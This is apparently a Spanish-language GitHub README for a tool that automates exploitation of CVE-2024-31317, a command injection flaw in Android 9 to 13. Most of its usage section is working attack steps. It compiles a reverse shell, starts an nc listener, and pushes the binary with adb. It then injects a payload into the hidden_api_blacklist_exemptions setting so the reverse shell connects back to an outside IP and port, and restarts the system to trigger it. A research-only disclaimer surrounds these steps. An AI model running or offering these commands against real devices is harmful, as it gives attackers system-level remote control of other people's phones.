
Herramienta de despliegue automatizado para CVE-2024-31317, una vulnerabilidad de inyección de comandos en Android 9-13. Incluye payload de reverse shell, script de compilación y análisis técnico para investigación y educación en seguridad.
Este proyecto es únicamente para fines de investigación y educación en seguridad. El uso de esta herramienta para realizar pruebas no autorizadas es ilegal. El autor no se hace responsable de ningún mal uso o daño.
CVE-2024-31317 es una vulnerabilidad de seguridad crítica que afecta a dispositivos Android 9 a Android 13, permitiendo que aplicaciones con permiso WRITE_SECURE_SETTINGS obtengan ejecución a nivel de sistema mediante inyección de comandos.
Este proyecto proporciona un análisis técnico detallado de la vulnerabilidad, código de prueba de concepto y herramientas de despliegue automatizadas.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# Iniciar el listener
nc -lvnp 4444
# Enviar y ejecutar
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Inyectar payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Activar la vulnerabilidad
adb shell stop && adb shell start
Este proyecto es únicamente para fines de investigación y educación en seguridad. Al usar esta herramienta usted acepta:
Este proyecto está bajo la licencia MIT - consulte el archivo LICENSE para más detalles
fcy10012 - GitHub
Proyecto de referencia: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ ¡Si este proyecto le resulta útil, por favor dele una estrella!